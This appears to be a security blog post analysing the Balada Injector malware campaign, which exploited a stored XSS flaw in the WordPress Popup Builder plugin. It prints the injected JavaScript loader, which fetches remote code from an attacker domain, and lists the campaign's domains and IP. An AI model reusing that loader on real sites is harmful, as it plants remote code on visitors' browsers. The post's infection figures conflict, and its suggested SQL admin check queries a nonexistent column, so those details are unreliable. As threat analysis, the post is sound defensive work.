Cyber Security Blogs
Over 6,700 WordPress websites use a vulnerable version of the Popup Builder plugin to build custom popups for marketing, informational, and functional purposes, inadvertently fell victim to the insidious Balada Injector malware.
This coordinated attack, discovered by security researchers at Dr. Web, not only exploited known flaws in WordPress themes and add-ons but also revealed the extensive reach of the Balada Injector operation, which had been compromising WordPress sites since 2017.
Balada Injector Modus Operandi Background and Scope
The Balada Injector campaign gained renown for compromising more than 17,000 WordPress sites, injecting a backdoor that redirected visitors to fake support pages, lottery sites, and push notification scams. Its latest emergence, initiated on December 13, 2023, closely followed the disclosure of a critical vulnerability in the widely used Popup Builder plugin. The vulnerability, a Stored XSS flaw marked as CVE-2023-6000, posed a severe threat to the security of over 200,000 sites using Popup Builder for various purposes.
Domain Analysis
Investigation into the domains used in these attacks revealed a pattern indicating an attempt to mask the source of origin. Cloudflare firewalls were employed to obscure the attackers’ identity. Security researcher Randy McEoin highlighted redirections in the campaign leading to push notification scams.
*SCAM NOTIFICATION (@rmceoin)*
Popup Builder Vulnerability Exploitation
The Balada Injector attackers wasted no time incorporating an exploit for the newly discovered Popup Builder vulnerability. This flaw allowed malicious JavaScript code execution in the site’s database, ultimately compromising the security of the affected websites. Popup Builder version 4.2.3 was swiftly released as a patch, emphasizing the critical need for administrators to update the plugin and secure their sites promptly.
php public static function parsePopupDataFromData($data) { // Code snippet for parsing Popup Builder data // … return $popupData; }
Inconsistencies in Popup Builder Plugin
Meanwhile, Popup Builder plugin analysis also revealed inconsistencies in handling certain POST parameters, leading to logic bugs that could be exploited for Stored XSS attacks.
The plugin’s vulnerability, reported on November 7, 2023, triggered a sequence of events that exposed weaknesses in its structure and handling of user input, ultimately paving the way for the Balada Injector campaign.
All credits go to Marc Montpas for the original research, with the WPScan team providing valuable feedback and assistance throughout.
Balada Injector’s Multi-Stage Attack Initial Script Injection
The Balada Injector campaign leveraged a multi-stage attack strategy, starting with injecting a script into compromised databases. The injected code, obfuscated with random comments, decoded into a script dynamically loading from a newly registered domain specialcraftbox[.]com. This script was a handler for the “sgpbWillOpen ” event in Popup Builder, allowing attackers to control the popup’s behavior.
javascript var d = document; var s = d.createElement(“script”); s.src = ‘hxxps://soft.specialcraftbox[.]com/JZFYbC’; d.getElementsByTagName(‘head’)[0].appendChild(s);
Backdoor Deployment
Beyond script injection, the Balada operators sought to establish a persistent presence by attempting to plant a backdoor on compromised sites. The injected script checked for specific admin-related cookies and, based on the presence or absence of these cookies, loaded subsequent scripts from designated domains.
Fake Wp-Felody Plugin
As part of their arsenal, the Balada attackers employed a fake WordPress plugin named ‘wp-felody.php’ to further exploit compromised sites. This seemingly innocuous plugin, with a deceptive description as “For melody plugin,” harbored sophisticated backdoor functionalities, including arbitrary code execution and communication with the attackers.
php // Code snippet from wp-felody.php function WPD_init() { // Backdoor functionality // … }
*Main Backdoor*
Secondary Infection via wp-blog-header.php
In yet another cunning move, Balada Injector utilized the wp-blog-header.php file to propagate the same JavaScript malware initially injected through the Popup Builder vulnerability.
By modifying this critical file, the attackers ensured a secondary infection layer, adding complexity to their campaign.
php // Code snippet from wp-blog-header.php add_action(‘wp_head’, ‘hook_csssss’);
*Balada injection in wp-blog-header.php (SUCRUI)*
Domain Strategy and Evolving Tactics Balada Domains and Cloudflare
The Balada operators strategically registered domains, such as specialcraftbox[.]com and greenfastline[.]com, on December 13, 2023, for their campaign. Cloudflare initially masked the real IP addresses of these domains, demonstrating a deliberate effort to obfuscate the origins of the attacks.
Redirect URL Patterns
Balada Injector exhibited consistent patterns in its redirect URLs, helping in identifying affected sites and domains. The redirect chain, involving specific subdomains and parameters, was a hallmark of the campaign’s methodology.
plaintext Balada Injector Redirect URL Patterns: – The chain ends with the 0. subdomain of the malicious domain. – URLs contain parameters sub1 and/or sub2 specifying subcampaign names. – Domain names often combine three English words, creating a distinctive pattern.
*URL Pattern*
Domain Registration Timeline
Analyzing the registration dates of domains used in the Balada campaign uncovered a strategic approach to domain management, hinting at an attempt to prolong the efficacy of their attacks.
| Date | Domain | Registrar | |————|————————–|————–| | 2023-12-13 | specialcraftbox[.]com | CloudFlare, later moved to 80.66.79[.]248| | 2023-12-13 | greenfastline[.]com | CloudFlare, later moved to 80.66.79[.]248| | … | … | … |
Infections, Detection, and Mitigation Extent of Infections
Despite the prompt release of Popup Builder version 4.2.3 to fix the vulnerability, the Balada Injector campaign left a significant trail of infections. Over 6,200 websites were detected with the malware, underscoring the rapidity with which attackers identified and exploited vulnerable sites.
wp-felody.php
The persistence of the threat posed by the Balada Injector campaign eventually became evident as the attackers leveraged the wp-felody.php plugin to execute additional malicious code, fetching payloads and maintaining communication with their command and control infrastructure.
Domain Movement and Countermeasures
Cloudflare’s intervention on January 6, 2024, resulted in the blocking of specialcraftbox[.]com, prompting a shift to a Moldovan server. This tactical move highlighted the agility of the attackers in adapting to countermeasures.
Takeaways and Recommendations Importance of Timely Updates
Irrespective of Balada Injector campaign or anything else that might come across, keeping WordPress plugins and themes always remains non negotiable. The Stored XSS vulnerability in Popup Builder, though swiftly addressed, led to thousands of infections due to delays in applying updates.
Vigilance against Malicious Admins and Plugins
Web administrators are urged to monitor for signs of malicious admin users and fake plugins, as infections like Balada Injector often involve the creation of unauthorized admin accounts
sql — SQL query to check for malicious admin users SELECT * FROM wp_users WHERE user_role = ‘admin’;
Cross-Site Contamination Prevention
Preventing cross-site contamination is paramount to halt the spread of malware within a server environment. Regular inspection, cleaning, and isolation of websites under the same server account are crucial measures to curb propagation.
Thorough Backdoor Removal
The urgency of addressing known vulnerabilities promptly is explicitly reflected in the Balada Injector’s case. Despite a swift resolution of the stored XSS vulnerability in Popup Builder, the attackers exploited older versions, impacting over 6,200 websites detected by PublicWWW detects the injection. A thorough cleanup is imperative, involving the removal of injected code from affected files. Employing a file integrity control system and professional malware cleanup services aids in comprehensive remediation.


![Is Surfshark One Worth It? [Honest ANSWER]](https://smartworks.redelite.ro/wp-content/uploads/2024/01/Is-Surfshark-One-Worth-It-Honest-ANSWER-Fq5rly-370x240_c.png)
